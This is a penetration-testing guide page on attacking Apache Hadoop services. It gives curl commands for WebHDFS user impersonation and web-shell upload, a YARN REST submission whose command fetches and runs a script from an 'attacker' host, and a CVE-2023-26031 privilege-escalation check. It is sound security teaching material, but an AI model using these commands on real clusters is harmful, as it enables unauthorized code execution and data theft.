50030-50060-50070-50075-50090-pentesting-hadoop.md (5394B)
1 --- 2 title: "50030-50060-50070-50075-50090 - Pentesting Hadoop" 3 section: "Network Services" 4 sectionSlug: "network-services-pentesting" 5 sourcePath: "src/network-services-pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # 50030-50060-50070-50075-50090 - Pentesting Hadoop 14 15 ## **Basic Information** 16 17 **Apache Hadoop** is an **open-source framework** for **distributed storage and processing** of **large datasets** across **computer clusters**. It uses **HDFS** for storage and **MapReduce** for processing. 18 19 Useful default and historical web/RPC ports include the following; verify them in the target's Hadoop version and configuration:<sup>[[3]](#references)</sup> 20 21 - **50070 / 9870** NameNode (WebHDFS) 22 - **50075 / 9864** DataNode 23 - **50090** Secondary NameNode 24 - **8088** YARN ResourceManager web UI & REST 25 - **8042** YARN NodeManager 26 - **8031/8032** YARN RPC (often forgotten and still unauth in many installs) 27 28 Nmap includes the following scripts for enumerating legacy Hadoop services:<sup>[[4]](#references)</sup> 29 30 - **`hadoop-jobtracker-info (Port 50030)`** 31 - **`hadoop-tasktracker-info (Port 50060)`** 32 - **`hadoop-namenode-info (Port 50070)`** 33 - **`hadoop-datanode-info (Port 50075)`** 34 - **`hadoop-secondary-namenode-info (Port 50090)`** 35 36 Hadoop's `simple` authentication mode trusts the asserted operating-system or `user.name` identity and is unsafe on an untrusted network. Secure mode uses Kerberos for HDFS, YARN, and MapReduce. Authorization, network exposure, and service-specific ACLs still determine impact, so do not treat every default installation as universally unauthenticated.<sup>[[5]](#references)</sup> 37 38 ## WebHDFS / HttpFS abuse (50070/9870 or 14000) 39 40 With `simple`/pseudo authentication, WebHDFS accepts a `user.name` query parameter. Subject to HDFS permissions and proxy-user settings, this can let a remote client assert an arbitrary user. Some quick primitives are:<sup>[[6]](#references)</sup> 41 42 ```bash 43 # list root directory 44 curl "http://<host>:50070/webhdfs/v1/?op=LISTSTATUS&user.name=hdfs" 45 46 # read arbitrary file from HDFS 47 curl -L "http://<host>:50070/webhdfs/v1/etc/hadoop/core-site.xml?op=OPEN&user.name=hdfs" 48 49 # upload a web shell / binary 50 curl -X PUT -T ./payload "http://<host>:50070/webhdfs/v1/tmp/payload?op=CREATE&overwrite=true&user.name=hdfs" -H 'Content-Type: application/octet-stream' 51 ``` 52 53 If HttpFS is enabled (default port **14000**) the same REST paths apply. Behind Kerberos you can still use `curl --negotiate -u :` with a valid ticket. 54 55 ## YARN unauth RCE (8088) 56 57 In insecure `simple` mode, an exposed ResourceManager REST API may accept application submissions as the unauthenticated pseudo-user (often `dr.who`). Whether the JSON below launches a useful command depends on the application submission context, queue ACLs, and cluster configuration.<sup>[[7]](#references)</sup> 58 59 ```bash 60 # 1) get an application id 61 curl -s -X POST http://<host>:8088/ws/v1/cluster/apps/new-application 62 63 # 2) submit DistributedShell pointing to a command 64 curl -s -X POST http://<host>:8088/ws/v1/cluster/apps \ 65 -H 'Content-Type: application/json' \ 66 -d '{ 67 "application-id":"application_1234567890000_0001", 68 "application-name":"pwn", 69 "am-container-spec":{ 70 "commands":{"command":"/bin/bash -c \"curl http://attacker/p.sh|sh\""} 71 }, 72 "application-type":"YARN" 73 }' 74 ``` 75 76 If port **8031/8032 RPC** is exposed, older clusters allow the same job submission over protobuf without auth (documented in several cryptominer campaigns) – treat those ports as RCE as well. 77 78 ## Local PrivEsc from YARN containers (CVE-2023-26031) 79 80 Hadoop 3.3.1–3.3.4 **container-executor** loads libs from a **relative RUNPATH**. A user who can run YARN containers (including remote submitters on insecure clusters) may drop a malicious `libcrypto.so` in a writable path and get **root** when `container-executor` runs with SUID.<sup>[[1]](#references)</sup><sup>[[2]](#references)</sup> 81 82 Quick check: 83 84 ```bash 85 readelf -d /opt/hadoop/bin/container-executor | grep 'RUNPATH\|RPATH' 86 # vulnerable if it contains $ORIGIN/:../lib/native/ 87 ls -l /opt/hadoop/bin/container-executor # SUID+root makes it exploitable 88 ``` 89 90 Fixed in **3.3.5**; ensure the binary is not SUID if secure containers aren’t required. 91 92 ## References 93 94 - [1] [Apache Hadoop official CVE list](https://hadoop.apache.org/cve_list.html) 95 - [2] [Wiz write-up on CVE-2023-26031](https://www.wiz.io/vulnerability-database/cve/cve-2023-26031) 96 - [3] [Apache Hadoop - Cluster setup and service ports](https://hadoop.apache.org/docs/stable/hadoop-project-dist/hadoop-common/ClusterSetup.html) 97 - [4] [Nmap NSE - `hadoop-jobtracker-info`](https://nmap.org/nsedoc/scripts/hadoop-jobtracker-info.html) 98 - [5] [Apache Hadoop - Secure Mode](https://hadoop.apache.org/docs/stable/hadoop-project-dist/hadoop-common/SecureMode.html) 99 - [6] [Apache Hadoop - WebHDFS REST API](https://hadoop.apache.org/docs/stable/hadoop-project-dist/hadoop-hdfs/WebHDFS.html) 100 - [7] [Apache Hadoop YARN - ResourceManager REST APIs](https://hadoop.apache.org/docs/stable/hadoop-yarn/hadoop-yarn-site/ResourceManagerRest.html)